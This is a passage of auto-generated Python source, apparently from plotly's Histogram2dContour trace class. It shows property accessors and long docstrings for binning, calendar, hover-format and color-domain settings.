giving no more than that many bins. For date
data, use milliseconds or "M<n>" for months, as
in `axis.dtick`. For category data, the number
of categories to bin together (always defaults
to 1).
start
Sets the starting value for the x axis bins.
Defaults to the minimum data value, shifted
down if necessary to make nice round values and
to remove ambiguous bin edges. For example, if
most of the data is integers we shift the bin
edges 0.5 down, so a `size` of 5 would have a
default `start` of -0.5, so it is clear that
0-4 are in the first bin, 5-9 in the second,
but continuous data gets a start of 0 and bins
[0,5), [5,10) etc. Dates behave similarly, and
`start` should be a date string. For category
data, `start` is based on the category serial
numbers, and defaults to -0.5.
Returns
-------
plotly.graph_objs.histogram2dcontour.XBins
"""
return self["xbins"]
@xbins.setter
def xbins(self, val):
self["xbins"] = val
# xcalendar
# ---------
@property
def xcalendar(self):
"""
Sets the calendar system to use with `x` date data.
The 'xcalendar' property is an enumeration that may be specified as:
- One of the following enumeration values:
['chinese', 'coptic', 'discworld', 'ethiopian',
'gregorian', 'hebrew', 'islamic', 'jalali', 'julian',
'mayan', 'nanakshahi', 'nepali', 'persian', 'taiwan',
'thai', 'ummalqura']
Returns
-------
Any
"""
return self["xcalendar"]
@xcalendar.setter
def xcalendar(self, val):
self["xcalendar"] = val
# xhoverformat
# ------------
@property
def xhoverformat(self):
"""
Sets the hover text formatting rulefor `x` using d3 formatting
mini-languages which are very similar to those in Python. For
numbers, see:
https://github.com/d3/d3-format/tree/v1.4.5#d3-format. And for
dates see: https://github.com/d3/d3-time-
format/tree/v2.2.3#locale_format. We add two items to d3's date
formatter: "%h" for half of the year as a decimal number as
well as "%{n}f" for fractional seconds with n digits. For
example, *2016-10-13 09:15:23.456* with tickformat
"%H~%M~%S.%2f" would display *09~15~23.46*By default the values
are formatted using `xaxis.hoverformat`.
The 'xhoverformat' property is a string and must be specified as:
- A string
- A number that will be converted to a string
Returns
-------
str
"""
return self["xhoverformat"]
@xhoverformat.setter
def xhoverformat(self, val):
self["xhoverformat"] = val
# xsrc
# ----
@property
def xsrc(self):
"""
Sets the source reference on Chart Studio Cloud for `x`.
The 'xsrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["xsrc"]
@xsrc.setter
def xsrc(self, val):
self["xsrc"] = val
# y
# -
@property
def y(self):
"""
Sets the sample data to be binned on the y axis.
The 'y' property is an array that may be specified as a tuple,
list, numpy array, or pandas Series
Returns
-------
numpy.ndarray
"""
return self["y"]
@y.setter
def y(self, val):
self["y"] = val
# yaxis
# -----
@property
def yaxis(self):
"""
Sets a reference between this trace's y coordinates and a 2D
cartesian y axis. If "y" (the default value), the y coordinates
refer to `layout.yaxis`. If "y2", the y coordinates refer to
`layout.yaxis2`, and so on.
The 'yaxis' property is an identifier of a particular
subplot, of type 'y', that may be specified as the string 'y'
optionally followed by an integer >= 1
(e.g. 'y', 'y1', 'y2', 'y3', etc.)
Returns
-------
str
"""
return self["yaxis"]
@yaxis.setter
def yaxis(self, val):
self["yaxis"] = val
# ybingroup
# ---------
@property
def ybingroup(self):
"""
Set a group of histogram traces which will have compatible
y-bin settings. Using `ybingroup`, histogram2d and
histogram2dcontour traces (on axes of the same axis type) can
have compatible y-bin settings. Note that the same `ybingroup`
value can be used to set (1D) histogram `bingroup`
The 'ybingroup' property is a string and must be specified as:
- A string
- A number that will be converted to a string
Returns
-------
str
"""
return self["ybingroup"]
@ybingroup.setter
def ybingroup(self, val):
self["ybingroup"] = val
# ybins
# -----
@property
def ybins(self):
"""
The 'ybins' property is an instance of YBins
that may be specified as:
- An instance of :class:`plotly.graph_objs.histogram2dcontour.YBins`
- A dict of string/value properties that will be passed
to the YBins constructor
Supported dict properties:
end
Sets the end value for the y axis bins. The
last bin may not end exactly at this value, we
increment the bin edge by `size` from `start`
until we reach or exceed `end`. Defaults to the
maximum data value. Like `start`, for dates use
a date string, and for category data `end` is
based on the category serial numbers.
size
Sets the size of each y axis bin. Default
behavior: If `nbinsy` is 0 or omitted, we
choose a nice round bin size such that the
number of bins is about the same as the typical
number of samples in each bin. If `nbinsy` is
provided, we choose a nice round bin size
giving no more than that many bins. For date
data, use milliseconds or "M<n>" for months, as
in `axis.dtick`. For category data, the number
of categories to bin together (always defaults
to 1).
start
Sets the starting value for the y axis bins.
Defaults to the minimum data value, shifted
down if necessary to make nice round values and
to remove ambiguous bin edges. For example, if
most of the data is integers we shift the bin
edges 0.5 down, so a `size` of 5 would have a
default `start` of -0.5, so it is clear that
0-4 are in the first bin, 5-9 in the second,
but continuous data gets a start of 0 and bins
[0,5), [5,10) etc. Dates behave similarly, and
`start` should be a date string. For category
data, `start` is based on the category serial
numbers, and defaults to -0.5.
Returns
-------
plotly.graph_objs.histogram2dcontour.YBins
"""
return self["ybins"]
@ybins.setter
def ybins(self, val):
self["ybins"] = val
# ycalendar
# ---------
@property
def ycalendar(self):
"""
Sets the calendar system to use with `y` date data.
The 'ycalendar' property is an enumeration that may be specified as:
- One of the following enumeration values:
['chinese', 'coptic', 'discworld', 'ethiopian',
'gregorian', 'hebrew', 'islamic', 'jalali', 'julian',
'mayan', 'nanakshahi', 'nepali', 'persian', 'taiwan',
'thai', 'ummalqura']
Returns
-------
Any
"""
return self["ycalendar"]
@ycalendar.setter
def ycalendar(self, val):
self["ycalendar"] = val
# yhoverformat
# ------------
@property
def yhoverformat(self):
"""
Sets the hover text formatting rulefor `y` using d3 formatting
mini-languages which are very similar to those in Python. For
numbers, see:
https://github.com/d3/d3-format/tree/v1.4.5#d3-format. And for
dates see: https://github.com/d3/d3-time-
format/tree/v2.2.3#locale_format. We add two items to d3's date
formatter: "%h" for half of the year as a decimal number as
well as "%{n}f" for fractional seconds with n digits. For
example, *2016-10-13 09:15:23.456* with tickformat
"%H~%M~%S.%2f" would display *09~15~23.46*By default the values
are formatted using `yaxis.hoverformat`.
The 'yhoverformat' property is a string and must be specified as:
- A string
- A number that will be converted to a string
Returns
-------
str
"""
return self["yhoverformat"]
@yhoverformat.setter
def yhoverformat(self, val):
self["yhoverformat"] = val
# ysrc
# ----
@property
def ysrc(self):
"""
Sets the source reference on Chart Studio Cloud for `y`.
The 'ysrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["ysrc"]
@ysrc.setter
def ysrc(self, val):
self["ysrc"] = val
# z
# -
@property
def z(self):
"""
Sets the aggregation data.
The 'z' property is an array that may be specified as a tuple,
list, numpy array, or pandas Series
Returns
-------
numpy.ndarray
"""
return self["z"]
@z.setter
def z(self, val):
self["z"] = val
# zauto
# -----
@property
def zauto(self):
"""
Determines whether or not the color domain is computed with
respect to the input data (here in `z`) or the bounds set in
`zmin` and `zmax` Defaults to `false` when `zmin` and `zmax`
are set by the user.
The 'zauto' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self["zauto"]
@zauto.setter
def zauto(self, val):
self["zauto"] = val
# zhoverformat
# ------------
@property
def zhoverformat(self):
"""
Sets the hover text formatting rulefor `z` using d3 formatting
mini-languages which are very similar to those in Python. For
numbers, see:
https://github.com/d3/d3-format/tree/v1.4.5#d3-format.By
default the values are formatted using generic number format.
The 'zhoverformat' property is a string and must be specified as:
- A string
- A number that will be converted to a string
Returns
-------
str
"""
return self["zhoverformat"]
@zhoverformat.setter
def zhoverformat(self, val):
self["zhoverformat"] = val
# zmax
# ----
@property
def zmax(self):
"""
Sets the upper bound of the color domain. Value should have the
same units as in `z` and if set, `zmin` must be set as well.
The 'zmax' property is a number and may be specified as:
- An int or float
Returns
-------
int|float
"""
return self["zmax"]
@zmax.setter
def zmax(self, val):
self["zmax"] = val
# zmid
# ----
@property
def zmid(self):
"""
Sets the mid-point of the color domain by scaling `zmin` and/or
`zmax` to be equidistant to this point. Value should have the
same units as in `z`. Has no effect when `zauto` is `false`.
The 'zmid' property is a number and may be specified as:
- An int or float
Returns
-------
int|float
"""
return self["zmid"]
@zmid.setter
def zmid(self, val):
self["zmid"] = val
# zmin
# ----
@property
def zmin(self):
"""
Sets the lower bound of the color domain. Value should have the
same units as in `z` and if set, `zmax` must be set as well.
The 'zmin' property is a number and may be specified as:
- An int or float
Returns
-------
int|float
"""
return self["zmin"]
@zmin.setter
def zmin(self, val):
self["zmin"] = val
# zsrc
# ----
@property
def zsrc(self):
"""
Sets the source reference on Chart Studio Cloud for `z`.
The 'zsrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["zsrc"]
@zsrc.setter
def zsrc(self, val):
self["zsrc"] = val
# type
# ----
@property
def type(self):
return self._props["type"]
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
autobinx
Obsolete: since v1.42 each bin attribute is auto-
determined separately and `autobinx` is not needed.
However, we accept `autobinx: true` or `false` and will
update `xbins` accordingly before deleting `autobinx`
from the trace.
autobiny
Obsolete: since v1.42 each bin attribute is auto-
determined separately and `autobiny` is not needed.
However, we accept `autobiny: true` or `false` and will
update `ybins` accordingly before deleting `autobiny`
from the trace.
autocolorscale
Determines whether the colorscale is a default palette
(`autocolorscale: true`) or the palette determined by
`colorscale`. In case `colorscale` is unspecified or
`autocolorscale` is true, the default palette will be
chosen according to whether numbers in the `color`
array are all positive, all negative or mixed.
autocontour
Determines whether or not the contour level attributes
are picked by an algorithm. If True, the number of
contour levels can be set in `ncontours`. If False, set
the contour level attributes in `contours`.
bingroup
Set the `xbingroup` and `ybingroup` default prefix For
example, setting a `bingroup` of 1 on two histogram2d
traces will make them their x-bins and y-bins match
separately.
coloraxis
Sets a reference to a shared color axis. References to
these shared color axes are "coloraxis", "coloraxis2",
"coloraxis3", etc. Settings for these shared color axes
are set in the layout, under `layout.coloraxis`,
`layout.coloraxis2`, etc. Note that multiple color
scales can be linked to the same color axis.
colorbar
:class:`plotly.graph_objects.histogram2dcontour.ColorBa
r` instance or dict with compatible properties
colorscale
Sets the colorscale. The colorscale must be an array
containing arrays mapping a normalized value to an rgb,
rgba, hex, hsl, hsv, or named color string. At minimum,
a mapping for the lowest (0) and highest (1) values are
required. For example, `[[0, 'rgb(0,0,255)'], [1,
'rgb(255,0,0)']]`. To control the bounds of the
colorscale in color space, use `zmin` and `zmax`.
Alternatively, `colorscale` may be a palette name
string of the following list: Blackbody,Bluered,Blues,C
ividis,Earth,Electric,Greens,Greys,Hot,Jet,Picnic,Portl
and,Rainbow,RdBu,Reds,Viridis,YlGnBu,YlOrRd.
contours
:class:`plotly.graph_objects.histogram2dcontour.Contour
s` instance or dict with compatible properties
customdata
Assigns extra data each datum. This may be useful when
listening to hover, click and selection events. Note
that, "scatter" traces also appends customdata items in
the markers DOM elements
customdatasrc
Sets the source reference on Chart Studio Cloud for
`customdata`.
histfunc
Specifies the binning function used for this histogram
trace. If "count", the histogram values are computed by
counting the number of values lying inside each bin. If
"sum", "avg", "min", "max", the histogram values are
computed using the sum, the average, the minimum or the
maximum of the values lying inside each bin
respectively.
histnorm
Specifies the type of normalization used for this
histogram trace. If "", the span of each bar
corresponds to the number of occurrences (i.e. the
number of data points lying inside the bins). If
"percent" / "probability", the span of each bar
corresponds to the percentage / fraction of occurrences
with respect to the total number of sample points
(here, the sum of all bin HEIGHTS equals 100% / 1). If
"density", the span of each bar corresponds to the
number of occurrences in a bin divided by the size of
the bin interval (here, the sum of all bin AREAS equals
the total number of sample points). If *probability
density*, the area of each bar corresponds to the
probability that an event will fall into the
corresponding bin (here, the sum of all bin AREAS
equals 1).
hoverinfo
Determines which trace information appear on hover. If
`none` or `skip` are set, no information is displayed
upon hovering. But, if `none` is set, click and hover
events are still fired.
hoverinfosrc
Sets the source reference on Chart Studio Cloud for
`hoverinfo`.
hoverlabel
:class:`plotly.graph_objects.histogram2dcontour.Hoverla
bel` instance or dict with compatible properties
hovertemplate
Template string used for rendering the information that
appear on hover box. Note that this will override
`hoverinfo`. Variables are inserted using %{variable},
for example "y: %{y}" as well as %{xother}, {%_xother},
{%_xother_}, {%xother_}. When showing info for several
points, "xother" will be added to those with different
x positions from the first point. An underscore before
or after "(x|y)other" will add a space on that side,
only when this field is shown. Numbers are formatted
using d3-format's syntax %{variable:d3-format}, for
example "Price: %{y:$.2f}".
https://github.com/d3/d3-format/tree/v1.4.5#d3-format
for details on the formatting syntax. Dates are
formatted using d3-time-format's syntax
%{variable|d3-time-format}, for example "Day:
%{2019-01-01|%A}". https://github.com/d3/d3-time-
format/tree/v2.2.3#locale_format for details on the
date formatting syntax. The variables available in
`hovertemplate` are the ones emitted as event data
described at this link
https://plotly.com/javascript/plotlyjs-events/#event-
data. Additionally, every attributes that can be
specified per-point (the ones that are `arrayOk: true`)
are available. variable `z` Anything contained in tag
`<extra>` is displayed in the secondary box, for
example "<extra>{fullData.name}</extra>". To hide the
secondary box completely, use an empty tag
`<extra></extra>`.
hovertemplatesrc
Sets the source reference on Chart Studio Cloud for
`hovertemplate`.
ids
Assigns id labels to each datum. These ids for object
constancy of data points during animation. Should be an
array of strings, not numbers or any other type.
idssrc
Sets the source reference on Chart Studio Cloud for
`ids`.
legendgroup
Sets the legend group for this trace. Traces part of
the same legend group hide/show at the same time when
toggling legend items.
legendgrouptitle
:class:`plotly.graph_objects.histogram2dcontour.Legendg
rouptitle` instance or dict with compatible properties
legendrank
Sets the legend rank for this trace. Items and groups
with smaller ranks are presented on top/left side while
with `*reversed* `legend.traceorder` they are on
bottom/right side. The default legendrank is 1000, so
that you can use ranks less than 1000 to place certain
items before all unranked items, and ranks greater than
1000 to go after all unranked items.
line
:class:`plotly.graph_objects.histogram2dcontour.Line`
instance or dict with compatible properties
marker
:class:`plotly.graph_objects.histogram2dcontour.Marker`
instance or dict with compatible properties
meta
Assigns extra meta information associated with this
trace that can be used in various text attributes.
Attributes such as trace `name`, graph, axis and
colorbar `title.text`, annotation `text`
`rangeselector`, `updatemenues` and `sliders` `label`
text all support `meta`. To access the trace `meta`
values in an attribute in the same trace, simply use
`%{meta[i]}` where `i` is the index or key of the
`meta` item in question. To access trace `meta` in
layout attributes, use `%{data[n[.meta[i]}` where `i`
is the index or key of the `meta` and `n` is the trace
index.
metasrc
Sets the source reference on Chart Studio Cloud for
`meta`.
name
Sets the trace name. The trace name appear as the
legend item and on hover.
nbinsx
Specifies the maximum number of desired bins. This
value will be used in an algorithm that will decide the
optimal bin size such that the histogram best
visualizes the distribution of the data. Ignored if
`xbins.size` is provided.
nbinsy
Specifies the maximum number of desired bins. This
value will be used in an algorithm that will decide the
optimal bin size such that the histogram best
visualizes the distribution of the data. Ignored if
`ybins.size` is provided.
ncontours
Sets the maximum number of contour levels. The actual
number of contours will be chosen automatically to be
less than or equal to the value of `ncontours`. Has an
effect only if `autocontour` is True or if
`contours.size` is missing.
opacity
Sets the opacity of the trace.
reversescale
Reverses the color mapping if true. If true, `zmin`
will correspond to the last color in the array and
`zmax` will correspond to the first color.
showlegend
Determines whether or not an item corresponding to this
trace is shown in the legend.
showscale
Determines whether or not a colorbar is displayed for
this trace.
stream
:class:`plotly.graph_objects.histogram2dcontour.Stream`
instance or dict with compatible properties
textfont
For this trace it only has an effect if `coloring` is
set to "heatmap". Sets the text font.
texttemplate
For this trace it only has an effect if `coloring` is
set to "heatmap". Template string used for rendering
the information text that appear on points. Note that
this will override `textinfo`. Variables are inserted
using %{variable}, for example "y: %{y}". Numbers are
formatted using d3-format's syntax
%{variable:d3-format}, for example "Price: %{y:$.2f}".
https://github.com/d3/d3-format/tree/v1.4.5#d3-format
for details on the formatting syntax. Dates are
formatted using d3-time-format's syntax
%{variable|d3-time-format}, for example "Day:
%{2019-01-01|%A}". https://github.com/d3/d3-time-
format/tree/v2.2.3#locale_format for details on the
date formatting syntax. Every attributes that can be
specified per-point (the ones that are `arrayOk: true`)
are available. variables `x`, `y`, `z` and `text`.
uid
Assign an id to this trace, Use this to provide object
constancy between traces during animations and
transitions.
uirevision
Controls persistence of some user-driven changes to the
trace: `constraintrange` in `parcoords` traces, as well
as some `editable: true` modifications such as `name`
and `colorbar.title`. Defaults to `layout.uirevision`.
Note that other user-driven trace attribute changes are
controlled by `layout` attributes: `trace.visible` is
controlled by `layout.legend.uirevision`,
`selectedpoints` is controlled by
`layout.selectionrevision`, and `colorbar.(x|y)`
(accessible with `config: {editable: true}`) is
controlled by `layout.editrevision`. Trace changes are
tracked by `uid`, which only falls back on trace index
if no `uid` is provided. So if your app can add/remove
traces before the end of the `data` array, such that
the same trace has a different index, you can still
preserve user-driven changes if you give each trace a
`uid` that stays with it as it moves.
visible
Determines whether or not this trace is visible. If
"legendonly", the trace is not drawn, but can appear as
a legend item (provided that the legend itself is
visible).
x
Sets the sample data to be binned on the x axis.
xaxis
Sets a reference between this trace's x coordinates and
a 2D cartesian x axis. If "x" (the default value), the
x coordinates refer to `layout.xaxis`. If "x2", the x
coordinates refer to `layout.xaxis2`, and so on.
xbingroup
Set a group of histogram traces which will have
compatible x-bin settings. Using `xbingroup`,
histogram2d and histogram2dcontour traces (on axes of
the same axis type) can have compatible x-bin settings.
Note that the same `xbingroup` value can be used to set
(1D) histogram `bingroup`
xbins
:class:`plotly.graph_objects.histogram2dcontour.XBins`
instance or dict with compatible properties
xcalendar
Sets the calendar system to use with `x` date data.
xhoverformat
Sets the hover text formatting rulefor `x` using d3
formatting mini-languages which are very similar to
those in Python. For numbers, see:
https://github.com/d3/d3-format/tree/v1.4.5#d3-format.
And for dates see: https://github.com/d3/d3-time-
format/tree/v2.2.3#locale_format. We add two items to
d3's date formatter: "%h" for half of the year as a
decimal number as well as "%{n}f" for fractional
seconds with n digits. For example, *2016-10-13
09:15:23.456* with tickformat "%H~%M~%S.%2f" would
display *09~15~23.46*By default the values are
formatted using `xaxis.hoverformat`.
xsrc
Sets the source reference on Chart Studio Cloud for
`x`.
y
Sets the sample data to be binned on the y axis.
yaxis
Sets a reference between this trace's y coordinates and
a 2D cartesian y axis. If "y" (the default value), the
y coordinates refer to `layout.yaxis`. If "y2", the y
coordinates refer to `layout.yaxis2`, and so on.
ybingroup
Set a group of histogram traces which will have
compatible y-bin settings. Using `ybingroup`,
histogram2d and histogram2dcontour traces (on axes of
the same axis type) can have compatible y-bin settings.
Note that the same `ybingroup` value can be used to set
(1D) histogram `bingroup`
ybins
:class:`plotly.graph_objects.histogram2dcontour.YBins`
instance or dict with compatible properties
ycalendar
Sets the calendar system to use with `y` date data.
yhoverformat
Sets the hover text formatting rulefor `y` using d3
formatting mini-languages which are very similar to
those in Python. For numbers, see:
https://github.com/d3/d3-format/tree/v1.4.5#d3-format.
And for dates see: https://github.com/d3/d3-time-
format/tree/v2.2.3#locale_format. We add two items to
d3's date formatter: "%h" for half of the year as a
decimal number as well as "%{n}f" for fractional
seconds with n digits. For example, *2016-10-13
09:15:23.456* with tickformat "%H~%M~%S.%2f" would
display *09~15~23.46*By default the values are
formatted using `yaxis.hoverformat`.
ysrc
Sets the source reference on Chart Studio Cloud for
`y`.
z
Sets the aggregation data.
zauto
Determines whether or not the color domain is computed
with respect to the input data (here in `z`) or the
bounds set in `zmin` and `zmax` Defaults to `false`
when `zmin` and `zmax` are set by the user.
zhoverformat
Sets the hover text formatting rulefor `z` using d3
formatting mini-languages which are very similar to
those in Python. For numbers, see: https://github.com/d
3/d3-format/tree/v1.4.5#d3-format.By default the values
are formatted using generic number format.
zmax
Sets the upper bound of the color domain. Value should
have the same units as in `z` and if set, `zmin` must
be set as well.
zmid
Sets the mid-point of the color domain by scaling
`zmin` and/or `zmax` to be equidistant to this point.
Value should have the same units as in `z`. Has no
effect when `zauto` is `false`.
zmin
Sets the lower bound of the color domain. Value should
have the same units as in `z` and if set, `zmax` must
be set as well.
zsrc
Sets the source reference on Chart Studio Cloud for
`z`.
"""
def __init__(
self,
arg=None,
autobinx=None,
autobiny=None,
autocolorscale=None,
autocontour=None,
bingroup=None,
coloraxis=None,
colorbar=None,
colorscale=None,
contours=None,
customdata=None,
customdatasrc=None,
histfunc=None,
histnorm=None,
hoverinfo=None,
hoverinfosrc=None,
hoverlabel=None,
hovertemplate=None,
hovertemplatesrc=None,
ids=None,
idssrc=None,
legendgroup=None,
legendgrouptitle=None,
legendrank=None,
line=None,
marker=None,
meta=None,
metasrc=None,
name=None,
nbinsx=None,
nbinsy=None,
ncontours=None,
opacity=None,
reversescale=None,
showlegend=None,
showscale=None,
stream=None,
textfont=None,
texttemplate=None,
uid=None,
uirevision=None,
visible=None,
x=None,
xaxis=None,
xbingroup=None,
xbins=None,
xcalendar=None,
xhoverformat=None,
xsrc=None,
y=None,
yaxis=None,
ybingroup=None,
ybins=None,
ycalendar=None,
yhoverformat=None,
ysrc=None,
z=None,
zauto=None,
zhoverformat=None,
zmax=None,
zmid=None,
zmin=None,
zsrc=None,
**kwargs,
):
"""
Construct a new Histogram2dContour object
The sample data from which statistics are computed is set in
`x` and `y` (where `x` and `y` represent marginal
distributions, binning is set in `xbins` and `ybins` in this
case) or `z` (where `z` represent the 2D distribution and
binning set, binning is set by `x` and `y` in this case). The
resulting distribution is visualized as a contour plot.
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of
:class:`plotly.graph_objs.Histogram2dContour`
autobinx
Obsolete: since v1.42 each bin attribute is auto-
determined separately and `autobinx` is not needed.
However, we accept `autobinx: true` or `false` and will
update `xbins` accordingly before deleting `autobinx`
from the trace.
autobiny
Obsolete: since v1.42 each bin attribute is auto-
determined separately and `autobiny` is not needed.
However, we accept `autobiny: true` or `false` and will
update `ybins` accordingly before deleting `autobiny`
from the trace.
autocolorscale
Determines whether the colorscale is a default palette
(`autocolorscale: true`) or the palette determined by
`colorscale`. In case `colorscale` is unspecified or
`autocolorscale` is true, the default palette will be
chosen according to whether numbers in the `color`
array are all positive, all negative or mixed.
autocontour
Determines whether or not the contour level attributes
are picked by an algorithm. If True, the number of
contour levels can be set in `ncontours`. If False, set
the contour level attributes in `contours`.
bingroup
Set the `xbingroup` and `ybingroup` default prefix For
example, setting a `bingroup` of 1 on two histogram2d
traces will make them their x-bins and y-bins match
separately.
coloraxis
Sets a reference to a shared color axis. References to
these shared color axes are "coloraxis", "coloraxis2",
"coloraxis3", etc. Settings for these shared color axes
are set in the layout, under `layout.coloraxis`,
`layout.coloraxis2`, etc. Note that multiple color
scales can be linked to the same color axis.
colorbar
:class:`plotly.graph_objects.histogram2dcontour.ColorBa
r` instance or dict with compatible properties
colorscale
Sets the colorscale. The colorscale must be an array
containing arrays mapping a normalized value to an rgb,
rgba, hex, hsl, hsv, or named color string. At minimum,
a mapping for the lowest (0) and highest (1) values are
required. For example, `[[0, 'rgb(0,0,255)'], [1,
'rgb(255,0,0)']]`. To control the bounds of the
colorscale in color space, use `zmin` and `zmax`.
Alternatively, `colorscale` may be a palette name
string of the following list: Blackbody,Bluered,Blues,C
ividis,Earth,Electric,Greens,Greys,Hot,Jet,Picnic,Portl
and,Rainbow,RdBu,Reds,Viridis,YlGnBu,YlOrRd.
contours
:class:`plotly.graph_objects.histogram2dcontour.Contour
s` instance or dict with compatible properties
customdata
Assigns extra data each datum. This may be useful when
listening to hover, click and selection events. Note
that, "scatter" traces also appends customdata items in
the markers DOM elements
customdatasrc
Sets the source reference on Chart Studio Cloud for
`customdata`.
histfunc
Specifies the binning function used for this histogram
trace. If "count", the histogram values are computed by
counting the number of values lying inside each bin. If
"sum", "avg", "min", "max", the histogram values are
computed using the sum, the average, the minimum or the
maximum of the values lying inside each bin
respectively.
histnorm
Specifies the type of normalization used for this
histogram trace. If "", the span of each bar
corresponds to the number of occurrences (i.e. the
number of data points lying inside the bins). If
"percent" / "probability", the span of each bar
corresponds to the percentage / fraction of occurrences
with respect to the total number of sample points
(here, the sum of all bin HEIGHTS equals 100% / 1). If
"density", the span of each bar corresponds to the
number of occurrences in a bin divided by the size of
the bin interval (here, the sum of all bin AREAS equals
the total number of sample points). If *probability
density*, the area of each bar corresponds to the
probability that an event will fall into the
corresponding bin (here, the sum of all bin AREAS
equals 1).
hoverinfo
Determines which trace information appear on hover. If
`none` or `skip` are set, no information is displayed
upon hovering. But, if `none` is set, click and hover
events are still fired.
hoverinfosrc
Sets the source reference on Chart Studio Cloud for
`hoverinfo`.
hoverlabel
:class:`plotly.graph_objects.histogram2dcontour.Hoverla
bel` instance or dict with compatible properties
hovertemplate
Template string used for rendering the information that
appear on hover box. Note that this will override
`hoverinfo`. Variables are inserted using %{variable},
for example "y: %{y}" as well as %{xother}, {%_xother},
{%_xother_}, {%xother_}. When showing info for several
points, "xother" will be added to those with different
x positions from the first point. An underscore before
or after "(x|y)other" will add a space on that side,
only when this field is shown. Numbers are formatted
using d3-format's syntax %{variable:d3-format}, for
example "Price: %{y:$.2f}".
https://github.com/d3/d3-format/tree/v1.4.5#d3-format
for details on the formatting syntax. Dates are
formatted using d3-time-format's syntax
%{variable|d3-time-format}, for example "Day:
%{2019-01-01|%A}". https://github.com/d3/d3-time-
format/tree/v2.2.3#locale_format for details on the
date formatting syntax. The variables available in
`hovertemplate` are the ones emitted as event data
described at this link
https://plotly.com/javascript/plotlyjs-events/#event-
data. Additionally, every attributes that can be
specified per-point (the ones that are `arrayOk: true`)
are available. variable `z` Anything contained in tag
`<extra>` is displayed in the secondary box, for
example "<extra>{fullData.name}</extra>". To hide the
secondary box completely, use an empty tag
`<extra></extra>`.
hovertemplatesrc
Sets the source reference on Chart Studio Cloud for
`hovertemplate`.
ids
Assigns id labels to each datum. These ids for object
constancy of data points during animation. Should be an
array of strings, not numbers or any other type.
idssrc
Sets the source reference on Chart Studio Cloud for
`ids`.
legendgroup
Sets the legend group for this trace. Traces part of
the same legend group hide/show at the same time when
toggling legend items.
legendgrouptitle
:class:`plotly.graph_objects.histogram2dcontour.Legendg
rouptitle` instance or dict with compatible properties
legendrank
Sets the legend rank for this trace. Items and groups
with smaller ranks are presented on top/left side while
with `*reversed* `legend.traceorder` they are on
bottom/right side. The default legendrank is 1000, so
that you can use ranks less than 1000 to place certain
items before all unranked items, and ranks greater than
1000 to go after all unranked items.
line
:class:`plotly.graph_objects.histogram2dcontour.Line`
instance or dict with compatible properties
marker
:class:`plotly.graph_objects.histogram2dcontour.Marker`
instance or dict with compatible properties
meta
Assigns extra meta information associated with this
trace that can be used in various text attributes.
Attributes such as trace `name`, graph, axis and
colorbar `title.text`, annotation `text`
`rangeselector`, `updatemenues` and `sliders` `label`
text all support `meta`. To access the trace `meta`
values in an attribute in the same trace, simply use
`%{meta[i]}` where `i` is the index or key of the
`meta` item in question. To access trace `meta` in
layout attributes, use `%{data[n[.meta[i]}` where `i`
is the index or key of the `meta` and `n` is the trace
index.
metasrc
Sets the source reference on Chart Studio Cloud for
`meta`.
name
Sets the trace name. The trace name appear as the
legend item and on hover.
nbinsx
Specifies the maximum number of desired bins. This
value will be used in an algorithm that will decide the
optimal bin size such that the histogram best
visualizes the distribution of the data. Ignored if
`xbins.size` is provided.
nbinsy
Specifies the maximum number of desired bins. This
value will be used in an algorithm that will decide the
optimal bin size such that the histogram best
visualizes the distribution of the data. Ignored if
`ybins.size` is provided.
ncontours
Sets the maximum number of contour levels. The actual
number of contours will be chosen automatically to be
less than or equal to the value of `ncontours`. Has an
effect only if `autocontour` is True or if
`contours.size` is missing.
opacity
Sets the opacity of the trace.
reversescale
Reverses the color mapping if true. If true, `zmin`
will correspond to the last color in the array and
`zmax` will correspond to the first color.
showlegend
Determines whether or not an item corresponding to this
trace is shown in the legend.
showscale
Determines whether or not a colorbar is displayed for
this trace.
stream
:class:`plotly.graph_objects.histogram2dcontour.Stream`
instance or dict with compatible properties
textfont
For this trace it only has an effect if `coloring` is
set to "heatmap". Sets the text font.
texttemplate
For this trace it only has an effect if `coloring` is
set to "heatmap". Template string used for rendering
the information text that appear on points. Note that
this will override `textinfo`. Variables are inserted
using %{variable}, for example "y: %{y}". Numbers are
formatted using d3-format's syntax
%{variable:d3-format}, for example "Price: %{y:$.2f}".
https://github.com/d3/d3-format/tree/v1.4.5#d3-format
for details on the formatting syntax. Dates are
formatted using d3-time-format's syntax
%{variable|d3-time-format}, for example "Day:
%{2019-01-01|%A}". https://github.com/d3/d3-time-
format/tree/v2.2.3#locale_format for details on the
date formatting syntax. Every attributes that can be
specified per-point (the ones that are `arrayOk: true`)
are available. variables `x`, `y`, `z` and `text`.
uid
Assign an id to this trace, Use this to provide object
constancy between traces during animations and
transitions.
uirevision
Controls persistence of some user-driven changes to the
trace: `constraintrange` in `parcoords` traces, as well
as some `editable: true` modifications such as `name`
and `colorbar.title`. Defaults to `layout.uirevision`.
Note that other user-driven trace attribute changes are
controlled by `layout` attributes: `trace.visible` is
controlled by `layout.legend.uirevision`,
`selectedpoints` is controlled by
`layout.selectionrevision`, and `colorbar.(x|y)`
(accessible with `config: {editable: true}`) is
controlled by `layout.editrevision`. Trace changes are
tracked by `uid`, which only falls back on trace index
if no `uid` is provided. So if your app can add/remove
traces before the end of the `data` array, such that
the same trace has a different index, you can still
preserve user-driven changes if you give each trace a
`uid` that stays with it as it moves.
visible
Determines whether or not this trace is visible. If
"legendonly", the trace is not drawn, but can appear as
a legend item (provided that the legend itself is
visible).
x
Sets the sample data to be binned on the x axis.
xaxis
Sets a reference between this trace's x coordinates and
a 2D cartesian x axis. If "x" (the default value), the
x coordinates refer to `layout.xaxis`. If "x2", the x
coordinates refer to `layout.xaxis2`, and so on.
xbingroup
Set a group of histogram traces which will have
compatible x-bin settings. Using `xbingroup`,
histogram2d and histogram2dcontour traces (on axes of
the same axis type) can have compatible x-bin settings.
Note that the same `xbingroup` value can be used to set
(1D) histogram `bingroup`
xbins
:class:`plotly.graph_objects.histogram2dcontour.XBins`
instance or dict with compatible properties
xcalendar
Sets the calendar system to use with `x` date data.
xhoverformat
Sets the hover text formatting rulefor `x` using d3
formatting mini-languages which are very similar to
those in Python. For numbers, see:
https://github.com/d3/d3-format/tree/v1.4.5#d3-format.
And for dates see: https://github.com/d3/d3-time-
